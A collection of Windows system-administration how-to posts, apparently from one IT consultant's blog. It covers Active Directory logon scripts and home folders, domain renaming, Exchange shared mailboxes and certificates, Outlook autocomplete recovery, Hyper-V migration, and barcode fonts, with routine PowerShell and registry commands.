For the curious... Yes, it is possible to have 2 domains on the same network subnet at the same time. But there can only be one DHCP and both domains should reference the other in the DNS -> FORWARD LOOKUP ZONES. Simply add the other domain and the IP address of the other domain's server.

Null result from socket | Watchguard, Mimecast and Office365
Couldn't get email from certain outside domains. Further investigation revealed that this is only happening from domains hosted at Office365. The error message in Mimecast is "Null result from socket."
This means that there is no response from the internal email server when Mimecast tries to deliver the message. That means it is being blocked by the WatchGuard. So WatchGuard is blocking anything where the header is too large. In the SMTP proxy settings, the "Maximum email header size" is at 20,000 bytes. We set it to: 21000.
Save > Push-Config
That did it!
NOTES:
http://www.watchguard.com/help/docs/wsm/xtm_11/en-us/content/en-us/proxies/smtp/proxy_smtp_gen_settings_c.html

Set Logon Script For Everyone in Domain With Powershell | Set Logon Script For Everyone in OU With Powershell
Good morning class! Today, let's set the LOGON SCRIPT for everyone in a domain or in an OU:
To clear the value:
get-aduser -filter * -searchbase "ou=<location>,dc=<domain-name>,dc=com" |set-aduser -clear scriptpath
To set the value:
get-aduser -filter * -searchbase "ou=<location>,dc=<domain-name>,dc=com" |set-aduser -scriptpath logonscriptfilenamehere
Or for a single user:
set-aduser foo.user -scriptpath logonscriptfilenamehere
What About More? I Want More! Like the Home Folder?
Now I already know what you are going to ask... "Can I set the HOME FOLDER as well?" YES!!! It's a little complicated so it is in another article here: http://www.daknetworks.com/index.php/blog/390-how-to-setup-home-drives-home-folders-and-login-scripts

How To Setup Home Drives, Home Folders and Login Scripts Automatically
Good morning class! This isn't duplicate content. This is valuable! I don't want the HOME-DRIVES part of the other article lost. So here it is:
• -setup a "users" folder on the server.
• -share the folder as: users$
• -set share-permissions to: EVERYONE=FULL-ACCESS.
• -set ntfs-permissions > disable-inheritance.
• -set ntfs-permissions: DOMAIN-USERS (or other sub-group if a large domain) > this-folder-only = Traverse | Create-Folders
• -set ntfs-permissions: CREATOR OWNER > Subfolders-and-files = Full-Control
• -set ntfs-permissions: SYSTEM > this-folder-Subfolders-and-files = Full-Control
• -set ntfs-permissions: DOMAIN-ADMINS > this-folder-Subfolders-and-files = Full-Control
• -run powershell (as admin).
• -to get the values, type: get-aduser foo.user -properties homedrive, homedirectory, scriptpath
• -to clear the values, type: set-aduser foo.user -clear homedrive, homedirectory, scriptpath
• -to set the values, type: set-aduser foo.user -homedrive Z -homedirectory \\<server-name>\users$\foo.user -scriptpath logonscriptfilenamehere
We used to use %username% as a variable. But that doesn't work in powershell. However if you want to achieve the same, it's a little long-winded:
• -type: $username = (get-aduser foo.user -properties samaccountname |foreach { $_.samaccountname }).ToString()
• -type: set-aduser $username -homedrive Z -homedirectory \\<server-name>\users$\$username -scriptpath logonscriptfilenamehere
$username should be left as is. The folder will automatically be created and named exactly as the username! Too bad it doesn't automatically create the folder permissions like the GUI does in AD. To set the permissions:
• -type: icacls ("\\<server-name>\users$\" + "$username") /grant ("$username" + ':(OI)(CI)F') /T
For an entire Domain or OU
How about for the whole domain or for an OU.
Forget the long-winded scripts you see plastered all over the internet:
• -to get the values, type: get-aduser -filter * -searchbase "ou=<location>,ou=<users>,dc=<domain-name>,dc=com" -properties homedrive, homedirectory, scriptpath |ft name, homedrive, homedirectory
• -to clear the values, type: get-aduser -filter * -searchbase "ou=<location>,ou=<users>,dc=<domain-name>,dc=com" |set-aduser -clear homedrive, homedirectory, scriptpath
• -to set the values, type:
$usernames = (get-aduser -filter * -searchbase "ou=<location>,ou=<users>,dc=<domain-name>,dc=com" -properties samaccountname |foreach { $_.samaccountname })
foreach ($username in $usernames) {set-aduser $username -homedrive Z -homedirectory \\<server-name>\users$\$username -scriptpath logonscriptname}
• -to set the permissions, type:
$userfolder = "\\<server-name>\users$\"
foreach ($username in $usernames) {icacls ("$userfolder" + "$username") /grant ("$username" + ':(OI)(CI)F') /T}
!!!Please double-check and triple-check to make sure you have the correct punctuation above. This can be a career-changing event if you get this wrong!!!
NOTES:
Hopefully, it is obvious that <location>, <users>, <file-name> and <domain-name> should be replaced/adjusted/deleted/added with your values.
https://windowsserveressentials.com/2012/10/29/powershell-make-it-do-something-useful/

Create Trust Between Two Domains
I was going to write an article on how to create a trust relationship between two domains but the hard work has already been done by the fabulous people over at: https://blog.thesysadmins.co.uk/admt-series-1-preparing-active-directory.html

Rename Domain
-rdp into dc1.olddomain.tld
-go to dns tree.
-right-click FORWARD-LOOKUP-ZONE.
-click NEXT > NEXT > NEXT
-type in newdomain.tld
-click NEXT > NEXT > FINISH (this is your new domain name)
-cd c:\installs
-rendom /list
-edit c:\installs\Domainlist.xml
-replace olddomain.tld with newdomain.tld (in 4 places.
The last place doesn't have a .tld)
-rendom /prepare
-rendom /execute
-reboot
-netdom computername dc1.olddomain.tld /makeprimary:dc1.newdomain.tld
-reboot
-gpfixup /olddns:olddomain.tld /newdns:newdomain.tld
-gpfixup /oldnb:olddomain /newnb:newdomain
-rendom /clean
-rendom /end
-remove olddomain.tld from dns tree.
-final reboot to make sure it survives reboot.
-go to DHCP tree.
-go to ipv4 > server-options
-change dns domain name to newdomain.tld
-restart DHCP service
-you may have to change each scope > scope-options
Client computers will need to be rebooted twice.
-once dc is rebooted, wait 15 minutes.
-reboot client computers.
-wait 15 minutes.
-reboot client computers again.
Client computers' suffix should be changed automatically. If you need a regedit to change the primary dns suffix when membership changes:
echo y | reg add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v SyncDomainWithMembership /t REG_DWORD /d 00000001
If you have problems with a client pc joining the new domain, you can:
-netdom remove oldpc /Domain:olddomain.tld /Force
-reboot
-join newdomain.tld
If you really, really, really need, you can use the USER-PROFILE-WIZARD at https://www.forensit.com/downloads.html
NOTES:
-these are better instructions than mine: https://mizitechinfo.wordpress.com

Hyper-V Migration
This is an offline migration (not a live migration). Here's how:
On the older HYPER-V host:
-shut the VM down gracefully.
-click ACTION > EXPORT (at the top). This will export the entire VM somewhere. This can be an external drive or a network share.
On the newer HYPER-V host:
-click ACTION > IMPORT-VIRTUAL-MACHINE
-select the folder of the EXPORT (from above).
-select REGISTER THE VIRTUAL MACHINE. This will leave the VM where it is.
-or select RESTORE THE VIRTUAL MACHINE. This will place the VM where you tell it to.

Delete AD User but Mailbox Doesn't Show Disconnected
There is a link between AD and EXCHANGE. But it isn't a hard link.
Meaning that just because you create an AD account doesn't mean an Exchange account will be created. Conversely, deleting an AD account doesn't mean that the EXCHANGE account is deleted. Rather it is DISCONNECTED. It remains this way for 30 days. Then it is deleted.
Sometimes you delete the AD account and the EXCHANGE account doesn't show DISCONNECTED until the MAILBOX-DATABASE runs its regular maintenance. But you can force it to run by:
• Get-MailboxDatabase | Get-MailboxStatistics | Format-List DisplayName, MailboxGuid, Database, DisconnectReason, DisconnectDate
• Update-StoreMailboxState -Database "db_name" -Identity "mailbox_guid"
This is useful if you want to import some AD users into the domain from another domain but they already have EXCHANGE accounts. You can:
• -import the other AD accounts.
• -show the mailboxes as disconnected.
• -reconnect the mailboxes to the other AD accounts.

Avago 3108 | LSI | MegaRaid | Broadcom | Supermicro
MegaRaid controllers can be confusing and difficult because of the companies that keep on merging together. Currently, Broadcom maintains LSI equipment. But, in my opinion, they are being difficult recently and forcing you to get support through the OEM's. OEM's like Supermicro don't have much information either. In any event, you can control the MegaRaid cards either:
-upon boot up with CTRL+H
-or through the MegaRaid Management Software
Again, I would list more but this web site has more information than we can provide:
Upon installation, the login is the login of the computer you are using. You can now manage your raid.

VHDX to Physical Disk
I created a VHDX from a physical disk using a program called Disk2vhd. Now I want to copy that VHDX back to a physical disk.
• -boot from E2B USB disk
• -select: systemrescuecd
Get your bearings by seeing what is recognized:
• fdisk -l | grep "/dev/"
To connect the VHDX and clone to the physical drive:
• -type: qemu-nbd --connect=/dev/nbd0 --format=vhdx <vhdx_file_name>
• -type: ddrescue --verbose --force /dev/nbd0 /dev/sda
To disconnect the VHDX:
• -type: umount /mnt
• -type: qemu-nbd --disconnect /dev/nbd0

Migrating Active Directory Users and Merging Domains
Imagine you are part of a company. That company is being bought out by a larger company. To ease feelings, new email accounts are created at the larger company (ie user@hq.tld). The computers remain on the domain of the smaller company (ie @branch.tld). Now comes a point in time where the larger company wants to join the domains together. What are the options? How do you handle this situation? Very good questions.
OPTION-1: 1 Forest & 2 Domains
A forest is a group of domains. It is possible to keep the domains separate but still have the same forest. @hq.tld and @branch.tld will live happily together and have a trust-relationship. Two users would still exist. For example, john.doe@hq.tld and john.doe@branch.tld would still exist, which is confusing for people.
OPTION-2: Parent-Child Domain
The parent domain is hq.tld. It is possible to have a child domain such as branch.hq.tld (or if you prefer, us.company.tld). Two users would still exist. For example, john.doe@hq.tld and john.doe@branch.hq.tld would still exist, which is confusing for people.
OPTION-3: Flat & Import
This consolidates everything down.
It gets rid of messiness and flattens the company to 1 domain of hq.tld. Only one user exists per person and this makes sense for people.
How To Flatten Domain and Import Users

Outlook 2016 Autocomplete (nk2)
When you start an email and you start to type in an email address, OUTLOOK will show a drop-down list of email addresses you've written to before. This is an AUTOCOMPLETE-list (This is not an address-book or contact-list). What's surprising to me is that, to users, this list is more important than the contact-list or address-book. Probably because it automatically shows. What's more surprising is that there is no connection between the contact-list, address-book or AUTOCOMPLETE-list.
History Autocomplete
The AUTOCOMPLETE file used to be called the NK2 file. There is a ton of information about the NK2 file. But it's 2017 and closing in on 2018; the NK2 file is no longer relevant. The data on the internet is becoming long in the tooth. So much bad information.
Location Autocomplete
In any event, the AUTOCOMPLETE list in OUTLOOK 2016 is here: C:\Users\foo.user\AppData\Local\Microsoft\outlook\RoamCache\
The file name is something like: Stream_Autocomplete_0_A603AC42FB764D4C9662D971D85637C2.dat
!!!Step 1 For Autocomplete!!!
Before you do anything, copy this file as a backup!!! The file size is small and can be copied in less than 5 seconds. This file is known to be volatile and can go from a large size down to zero without warning. This is why you want a backup.
Transfer Autocomplete
If you have an old computer and OUTLOOK setup and your new computer and OUTLOOK setup doesn't have the list, you can:
• -close OUTLOOK.
• -copy this file to the new computer.
• -place it in the following directory: C:\Users\foo.user\AppData\Local\Microsoft\outlook\RoamCache\
• -rename the current DAT file to something like: Stream_Autocomplete_0_A603AC42FB764D4C9662D971D85637C2.dat.old
• -rename the wanted DAT file (with all the info in it) to the current name, something like: Stream_Autocomplete_0_A603AC42FB764D4C9662D971D812345.dat
Export Autocomplete
You can export the names in the DAT file. Despite the name, NK2EDIT is the best tool for this:
This will save the file as an NK2 file that can later be imported somewhere else.
Import Autocomplete
This is for a fresh OUTLOOK with no AUTOCOMPLETE.
• -open the NK2 from the old system.
• -click FILE > EXPORT-TO-MESSAGE-STORE
This will overwrite the existing AUTOCOMPLETE with the items from the old AUTOCOMPLETE.
Merge Autocomplete
This is to merge the old AUTOCOMPLETE with the current AUTOCOMPLETE.
• -open the NK2 from the old system.
• -click FILE > IMPORT-FROM-MESSAGE-STORE
• (This will merge the current AUTOCOMPLETE with the info from the older AUTOCOMPLETE.)
• -click FILE > EXPORT-TO-MESSAGE-STORE
This will overwrite the existing AUTOCOMPLETE with the items from the old AUTOCOMPLETE.
Rebuild Autocomplete
Let's say that the AUTOCOMPLETE file is gone. For whatever reason, it is empty (I'm bashfully looking away, avoiding eye contact). But you still have your PST/OST file. Can't you just rebuild the AUTOCOMPLETE with information that is in the SENT-ITEMS folder? Yes, you can. Here's how:
• -open NK2EDIT (the list will be empty).
This will allow you to rebuild the AUTOCOMPLETE with items from your SENT-ITEMS folder. This is probably what you want; as everyone you've written an email to will automatically be placed in here. In addition, you can place a checkmark to add items from your INBOX as well. Fiddle around with the settings and when you are satisfied, click FILE > EXPORT-TO-MESSAGE-STORE.
Edit the AUTOCOMPLETE
• -open NK2EDIT and edit away.
• -be sure to FILE > EXPORT-TO-MESSAGE-STORE.
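The "Step 1" backup is easy to script so it runs before you touch anything. A minimal PowerShell sketch (the RoamCache path is the location given earlier; the backup folder name is my own choice):

```powershell
# Back up every autocomplete .dat file in the RoamCache folder.
$roamCache = "$env:LOCALAPPDATA\Microsoft\Outlook\RoamCache"
$backup    = "$env:USERPROFILE\Desktop\RoamCache-Backup"

New-Item -ItemType Directory -Path $backup -Force | Out-Null
Get-ChildItem $roamCache -Filter "Stream_Autocomplete_*.dat" |
    Copy-Item -Destination $backup
```

Close OUTLOOK first so the .dat file isn't locked while it is copied.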
Final Thoughts
In short, this is an oldy but goody. Considering the importance of AUTOCOMPLETE items to users, you wonder why this isn't built directly into OUTLOOK.
NOTES
There is a POWERSHELL script that didn't exactly work for me but it looks promising if it could be updated:

Outlook 2016 Won't Open - Crashes Upon Starting Outlook 2016
Here's how I fixed it:
Office365 Repair
• -close OUTLOOK
• -click START > CONTROL-PANEL > PROGRAMS-AND-FEATURES
• -click MICROSOFT-OFFICE-365
• -click CHANGE (at the top).
• -click FULL-REPAIR (not "quick-repair")
• -wait 15 minutes.
• -try OUTLOOK again when finished.
x64 Bit
If that doesn't work, I've found the x64-bit version to be more stable:
• -uninstall Microsoft Office x32
• -restart the computer.
• -install Microsoft Office x64
Outlook Safe Mode
If that doesn't work:
• -hold CONTROL
• -click the OUTLOOK icon to open.
• -click YES (for disable plugins)
• -uncheck everything.
• -click OK
• -close OUTLOOK
• -open OUTLOOK in normal mode.
Set Data File
If that doesn't work:
• -click START > SETTINGS > CONTROL-PANEL > MAIL
• -click EMAIL-ACCOUNTS
• -click DATA-FILES (at the top)
• -select your mail account in the list.
• -click SET-AS-DEFAULT (yes, even if it already is).
• -click CLOSE > CLOSE.
• -open OUTLOOK.
Update iCloud
If that doesn't work:
Office365 Account Conflict
If that doesn't work, you might have an OFFICE365 account conflict. You may have one OFFICE365 account for WORD, EXCEL, OUTLOOK and another OFFICE365 account for EMAIL.
• -click START > SETTINGS > ACCOUNT
• -click EMAIL-&-APP-ACCOUNTS (on the left-hand side).
• -remove the OFFICE365 account that is only for email (leaving the OFFICE365 account that is for WORD, EXCEL, etc or the one that you use to login to the computer [ie same as your username]).
• -make sure the correct DATA-FILE is set as the DEFAULT (see above).
• -open OUTLOOK
Office Update
If that doesn't work:
• -click START > SETTINGS
• -click UPDATE-&-SECURITY
• -install any updates and restart the computer.
Redo
If that doesn't work, you've probably spent too much time on this:
• -start a new profile.
• -add the email accounts back in.

Microsoft Edge Pop Up Blocker Exceptions
As of this writing, there is no pop-up blocker exception setting in Microsoft Edge. There is only an ON/OFF option. However, you can still adjust this manually through the registry or regedit. You can manually edit here:
[HKCU\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows\Allow]
Pop Up Blocker Exceptions Allow
Or you can follow the instructions below:
• -click start > run
• -type: cmd
• -type: echo y | reg add "HKCU\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows\Allow" /v "url-name-here" /t REG_BINARY /d 00000000
(NOTE: keep the quotes intact. Use *.domain.tld for wildcard.)
Pop Up Blocker Exceptions Allow In Private
Also note that InPrivate mode has separate values located here (which doesn't mean they are all that private):
• -click start > run
• -type: cmd
• -type: echo y | reg add "HKCU\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows\AllowInPrivate" /v "url-name-here" /t REG_BINARY /d 00000000
(NOTE: keep the quotes intact. Use *.domain.tld for wildcard.)

Exchange 2013 - Get the Number of Emails in a Folder
Here's how:
Get-MailboxFolderStatistics foo.user |Select Name, ItemsInFolder
It will show the folder structure and the number of items in each folder.
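The same cmdlet can be sorted and filtered when you only care about the busiest folders. A sketch using the same property names as above (foo.user is still a placeholder):

```powershell
# Largest folders first, skipping empty ones.
Get-MailboxFolderStatistics foo.user |
    Where-Object { $_.ItemsInFolder -gt 0 } |
    Sort-Object ItemsInFolder -Descending |
    Select-Object Name, ItemsInFolder
```

Handy before an archive or retention-policy change, to see where the mail actually lives.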
Exchange could not load the certificate with thumbprint. Or as the warning message states in the logs:
Microsoft Exchange could not load the certificate with thumbprint of 59235427B7C322A8CFD7E1EB939445A2EAF9F670 from the personal store on the local computer.
Get the information
There are a few ways to see the current certificate list. First is through the Exchange Management Shell (EMS):
• -type: get-exchangecertificate
You can see the same list in the Exchange Admin Center (EAC):
• EAC > servers > certificates
You can also see the same list in Internet Information Services (IIS):
• -click server-name (on the left-hand side).
• -click SERVER-CERTIFICATES (in the middle section).
Once you have the information displayed, find the thumbprint of the certificate you are using for email.
Fix the error
In EMS:
• -type: Enable-ExchangeCertificate -Thumbprint <new_certificate_thumbprint> -Services None
• -type: Enable-ExchangeCertificate -Thumbprint <new_certificate_thumbprint> -Services IMAP,POP,IIS,SMTP
Explanation
This error is actually coming from the configuration of the: get-transportservice
More specifically, the value at: get-transportservice |select InternalTransportCertificateThumbprint
In older versions this is called: get-transportserver
More specifically, the value at: get-transportserver |select InternalTransportCertificateThumbprint
With this command you will see the thumbprint of the certificate in the log. Typing the commands above will replace this value with the new value. For the curious, there is no fine-tuned fix. In other words, the following does not exist or work. Use the above commands:
set-transportservice InternalTransportCertificateThumbprint <new-certificate-thumbprint-here>

Find All Distribution Groups A User Is A Member Of
I hope that makes sense. Let's say you have a user name: foo.user.
What groups is foo.user a member of? Here's how:
Get-DistributionGroup -Filter "Members -like 'CN=foo user,OU=where-ever,OU=Users,DC=domain-name-here,DC=tld'"
Since the DistinguishedName is used, it makes it nearly impossible to use the command unless you keep it in a handy note somewhere. Instead, this may be easier:
-type: $distinguishedName = (Get-Mailbox -Identity foo.user).distinguishedname
-type: $group = Get-DistributionGroup -Filter "Members -like '$($distinguishedName)'"
-type: Write-Host $group

Adobe Lightroom High CPU on Mac OSX
Another article on the internet about Adobe Lightroom with high cpu on Mac OSX because, well, it's a problem (and Apple doesn't care).
• -close the Lightroom app.
• -delete: /Users/<username>/Library/Preferences/com.adobe.Lightroom6.plist
• -delete: /Users/<username>/Library/Preferences/com.adobe.Lightroom6.LSSharedFileList.plist
• -delete anything else that looks like it belongs to Lightroom in: /Users/<username>/Library/Preferences/
• -delete anything that looks like it belongs to Lightroom in: /Users/<username>/Library/Preferences/Adobe/
• -delete anything that looks like it belongs to Lightroom in: /Users/<username>/Library/Application Support/Adobe/
• -delete anything that looks like it belongs to Lightroom in: /Users/<username>/Library/Caches/Adobe/
• -open LIGHTROOM
• -click LIGHTROOM > PREFERENCES > GENERAL.
• -uncheck "Select the current/previous import collection during import."
• -click PERFORMANCE (at the top).
• -uncheck "Use Graphics Processor."
• -make sure the import folder that it is trying to import from exists. In other words, sometimes the last import location is an external drive that doesn't exist anymore. Change it to somewhere neutral like the DESKTOP.

Windows 10 Lock Icons
Here's how:
• -click here to download the program: http://www.donationcoder.com/Software/Skrommel/index.html#DeskLock
• -move the program to: C:\Program Files (x86)\DeskLock
• -right-click DeskLock.exe
• -click CREATE-SHORTCUT
• -move the shortcut to: C:\Users\$username\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup (where $username is the username you use to login to your computer)
• -arrange the icons the way you want.
• -reboot the computer.
Having various clients, it's always interesting to see different perspectives. There is a class of client that approaches computers differently than I do. One question this class asks is, "How do I lock my icons on my DESKTOP?" The thinking is that the DESKTOP is the User Interface (UI). This UI should not be changed unless given specific permission and instructions to do so. Changing it without permission or instruction is nearly a violation of human rights. With as much attention as UI gets (and rightly so), one would think that the DESKTOP arrangement is of utmost importance rather than being flippantly changed every time a feature update comes along. One Operating System that I know of (Ubuntu) went so far as to lock the UI so that the TASKBAR and START-BUTTON are locked on the left-hand side of the screen. And, of course, Mac OSX has always had the TASKBAR and APPLE menu at the top. A person unfamiliar with or afraid of computers will not want anything changed. And as we get older, we have the tendency to want everything to stay the same. Don't have 2 buttons if you can have one. Even Mac mice have only 1 button until told otherwise. Referring to Windows 10's annoying habit of re-arranging icons, as one client put it, "It's like someone coming into your home and rearranging your furniture without asking." I don't disagree.

Mimecast Undeliverable - Unknown Address Error
Problem
You get the message:
=====
The following message to <user@domain.tld> was undeliverable.
The reason for the problem:
5.1.0 - Unknown address error 550-'Invalid Recipient - https://community.mimecast.com/docs/DOC-1369#550'
=====
Furthermore, looking at the TRACKING diagnostics, you see the "Rejection Information" states, "Failed Known address verification." The issue is that the email address does exist in Exchange. What gives?
Solution
Well Mimecast has a few settings to receive email. This setting is on the domain/internal-directory level (administration > directories > internal-directories). There are a few options. One is "Accept emails for known recipients only." Accordingly, each user that you want to receive email for must be added to Mimecast. The first time a user sends an email outbound via Mimecast a user will be created. Since groups don't send email (typically), a Mimecast account is never added. So it's possible that there could be an email address in EXCHANGE that is not in Mimecast. Fortunately, users can also be added to Mimecast through:
• import (ie import a list)
• manually
• AD sync
If there are not a bunch of groups, it's probably easiest to just add the group email addresses manually.

Generating Barcodes - Code 39 and Code 128
Generating barcodes is somewhat easy but can get complicated for various reasons. Before we get to it, know that there are several types of barcode formats. We're focusing on linear barcodes, CODE 39 and CODE 128.
Code 39 (or Code 3 of 9)
Code 39 is simple. In short, surround the text with asterisks and change the font to 3-OF-9.
• -download the Code39 font here: http://www.fonts2u.com/3-of-9-barcode.font ([c] CAIL v1.0 - 1993)
• -install the font.
• -reboot the computer (this is required).
• -in WORD:
• type what you want in a barcode (ie ABC123).
• surround it with asterisks (ie *ABC123*).
• change the font to 3-OF-9.
• that should do it!
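The wrapping rule above (the asterisks are Code 39's start/stop characters) is trivial to script when you are preparing data in bulk. A PowerShell sketch (the function name is my own):

```powershell
# Wrap text in asterisks: the start/stop characters the 3-of-9 font expects.
function ConvertTo-Code39 ($text) { "*$text*" }

ConvertTo-Code39 "ABC123"   # -> *ABC123*
```

The Excel and FileMaker steps that follow do the same thing with CONCAT and a calculation field.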
• -in EXCEL
• type what you want in a barcode in column A: (ie ABC123)
• create a simple formula (use the CONCAT function) in column B that surrounds the text with asterisks: (ie *ABC123*)
• create a simple formula in column C that simply mirrors column B.
• change the font on column C to 3-OF-9.
• that should do it!
• -in FILEMAKER
• create a field called INFO as text.
• create a field called INFO_BARCODE as a calculation.
• create a calculation that concats the INFO field surrounded by asterisks ("*" & INFO & "*").
• put the fields on the layout.
• on the INFO_BARCODE field, change the font to 3-OF-9.
Code 128
Code128 is a little more challenging than Code39. You would want to use Code128 when you need a compact barcode in a small space where Code39 will not fit. The challenging item with Code128 is that you need to translate what you want in a barcode into a barcode-string that contains accented characters.
• -download the Code128 font here: http://www.dafont.com/code-128.font ([c] GRANDZABU v1.2 - 2003)
• -install the font.
• -reboot the computer (this is required).
• -go to an online barcode-string-builder, here: http://www.jtbarton.com/Barcodes/BarcodeStringBuilderExample.aspx
• -type what you want barcoded.
• -click TO CODE 128
• -in WORD:
• paste in the results.
• change the font to CODE-128.
• that should do it!
• -in EXCEL:
• -in FILEMAKER
• download the FILEMAKER plugin here: http://downloads.idautomation.com/IDAutomationFMPlugin.zip
• unzip the download.
• close FILEMAKER.
• copy the plugin file called IDAutomation.fmx and paste it in C:\Program Files\FileMaker\FileMaker Pro\Extensions (adjust the path to your version accordingly).
• open FILEMAKER.
• create a field called INFO as text.
• create a field called INFO_BARCODE as a calculation.
• create a calculation that returns the INFO field as a barcode string. Use the custom function like so: IDAu_Code128( INFO )
• the result should be calculated as TEXT (not NUMBER).
• put the fields on the layout.
• click FORMAT > FONTS > CONFIGURE/MORE-FONTS (at the top menu).
• find CODE-128 (in the left-hand column).
• click MOVE.
• click OK.
• select the INFO_BARCODE field.
• hold the CTRL and ALT keys (on your keyboard).
• select the Code-128 font (at the top).
• that should do it!
NOTES: For whatever reason, I struggled to do this for days. Again, I found a bunch of misinformation and confusing documents that led me astray. Even different/newer versions of the fonts were red herrings and did not produce correct results. With the correct fonts, installed correctly, with the correct plugins, installed correctly, with the correct calculations, calculating correctly, and the fonts configured correctly, I was finally able to do this.
Exchange 2013 Shared Mailbox
Background
A mailbox is a typical account. You have John Doe. He has an account. His account is a mailbox account. The account is john.doe@domain.tld.
Options
John works with others doing proposals. What are the options?
1. pseudonym
2. group-account
3. separate account
4. shared mailbox
5. outside system
Option 1 - Pseudonym (What you start out doing)
1-We can set up a pseudonym/fake-account/vanity-account. No matter what you call it, the idea is the same. It is an email address that automatically goes to a real account. For example: proposals@domain.tld automatically goes to the inbox of John Doe. This is great if only one person is responsible. But as the team grows, this becomes cumbersome.
Option 2 - Group Account (What you graduate to)
2-We can set up a group-account. This is similar to the above, but the email goes to more than one person. For example: proposals@domain.tld automatically goes to the INBOX of John Doe and Jane Doe. This is great if it is a small team.
The problem is that not everyone in the group knows whether a response was sent. Also, folder organization is different for everyone in the group. If you want everyone to have the same info and see the same responses, read on.
Option 3 - Separate Account (What you shouldn't do)
3-We can set up a separate account. This is a typical account, but instead of assigning it to one person, you give the username/password to a group of users. For example: proposals@domain.tld has its own inbox and several users connect to it by way of username/password.
NOTE: While this seems like a good idea, years of experience says that this is a bad, bad, bad idea. Mainly because years down the line, you can't find out who is responsible for the account. When you check the account, it has a bunch of email in the inbox that no one has checked for years. I have witnessed this countless times at many clients. Kindly convince them to do it another way, or just agree with them and set it up another way. The end result will be the same as below.
Option 4 - Shared Mailbox (What you'll be required to do)
4-We can set up a shared mailbox. A shared mailbox is very similar to a separate account. The difference is that rather than handing out a username/password and letting them connect to it, you assign the account to users and it automatically shows in their folder structure in OUTLOOK as a separate INBOX. This way, when five years pass, you can tell who is using the account. Here's how:
set-mailbox foo.user -Type Shared
Great! You are almost there. Now assign permissions to the people who need to use the shared mailbox. They will need both FULL-ACCESS and SEND-AS permissions to control the account and send messages. There is also a SEND-ON-BEHALF option available.
NOTE:
-the FULL-ACCESS permission is an EXCHANGE permission (add-mailboxpermission/set-mailboxpermission/get-mailboxpermission/remove-mailboxpermission).
-the SEND-ON-BEHALF permission is an EXCHANGE key property (set-mailbox foo.user -GrantSendOnBehalfTo / get-mailbox foo.user |select GrantSendOnBehalfTo).
-the SEND-AS permission is an AD permission (Add-ADPermission / get-adpermission foo.user -ExtendedRights Send-As -user user1).
Here's how to add the FULL-ACCESS and the SEND-AS permissions:
Add-MailboxPermission foo.user -User user1 -AccessRights FullAccess -InheritanceType All
Add-ADPermission -Identity "foo user" -User user1 -ExtendedRights "Send As"
You may have to fiddle around with the add-adpermission command, as it wants the AD NAME, like "FirstName LastName" (not the DISPLAY-NAME or ALIAS).
ANOTHER NOTE:
-the commands do not accept multiple values for the users. Your options are to create a group and run the command on the group (hint: do not do this), run the command separately for each user wanting access (hint: do this if there's a handful), run the command against a txt file (hint: do this if there's a bunch), or use the EAC/ECP.
You are doing great! That should just about do it.
Automapping Issues
But there's one more item to cover: AUTOMAPPING. AUTOMAPPING automatically makes the shared mailbox show in Outlook. This way, users do not have to manually add the account to their OUTLOOK... the shared account automatically shows. This saves a bunch of hassle trying to get everyone to use a second account, and it prevents dreaded OUTLOOK problems.
Adding the permissions above will automatically turn AUTOMAPPING on. There should be no further steps. However, what happens if the shared account doesn't show in OUTLOOK? What then? Well, this seems to be an issue many run into for various reasons. So let's cover some of them.
First, there is a way to turn AUTOMAPPING off so that you can add the account manually:
Add-MailboxPermission foo.user -User user1 -AccessRights FullAccess -InheritanceType All -AutoMapping $false
To check AUTOMAPPING, you have to query AD (not EXCHANGE). The automapped users are stored in the msExchDelegateListLink attribute on the shared mailbox:
Get-ADUser foo.user -Properties msExchDelegateListLink |select -ExpandProperty msExchDelegateListLink
This command will show a list of accounts. If an account is in the list, then AUTOMAPPING is turned on for that account.
Second, AUTOMAPPING won't work for Organization-Management-Administrators. This is because this group already has mailbox permissions set, and they automatically include a DENY (or DENY: True). DENY takes priority over ALLOW. There are ways to get around this, but it is outside the scope of this article.
Third, AUTOMAPPING doesn't work if DNS is incorrect/not-working-the-way-that-makes-OUTLOOK-happy. For whatever reason, AUTOMAPPING works fine for locations where we have a flat domain structure (everyone is on the same domain). It doesn't work when we have separate domains (ie the local computer domain is remotedomain.tld and the email domain is emaildomain.tld). Again, troubleshooting this is outside the scope of this article.
Fourth, wait. For whatever reason, sometimes it takes a few hours to show. Give it 24 hours before sounding the alarm.
So, putting it all together.
See the FULL-ACCESS permissions:
get-mailboxpermission foo.user |select user,accessrights,deny,inheritancetype
See the SEND-AS permissions:
get-adpermission foo.user -ExtendedRights Send-As -user user1
See the AUTOMAPPING value:
Get-ADUser foo.user -Properties msExchDelegateListLink |select -ExpandProperty msExchDelegateListLink
That's it! Go home. You're done for the day.
Outlook Web Access and Shared Mailboxes
Outlook Web Access (OWA) will not automatically map shared mailboxes the same way that the OUTLOOK app does. You will have to manually add the shared mailbox:
-right-click your name (on the left-hand side).
-type the name of the shared mailbox and click on the name that shows.
-the account will show on the left-hand side.
Sent Items with Shared Mailboxes
Sent items automatically go in the SENT folder of the delegate (the person accessing the shared mailbox) and not the shared mailbox.
Some people do not like this. So there is a registry edit you can do to put the sent message in the shared mailbox SENT folder instead:
echo y | reg add "HKCU\Software\Microsoft\Office\[version]\Outlook\Preferences" /v DelegateSentItemsStyle /t REG_DWORD /d 00000001
NOTE: [version] is:
OUTLOOK-2010 = 14.0
OUTLOOK-2013 = 15.0
OUTLOOK-2016 = 16.0
NOTE-2: Here's a really good article: http://windowsitpro.com/office-365/using-shared-mailboxes-office-365
Deleted Items with Shared Mailboxes
The same applies to deleted items. Here's the registry edit you can use to put the deleted messages in the shared mailbox DELETED-ITEMS folder:
echo y | reg add "HKCU\Software\Microsoft\Office\[version]\Outlook\Options\General" /v DelegateWastebasketStyle /t REG_DWORD /d 00000004
Option 5 - Outside System (What you should do. Hint: pick this one!)
5-The other option is to use an outside system: a customer relationship management tool, or CRM. Something like Salesforce, HighRise, Zendesk-Inbox, etc (I'm sure there are others).
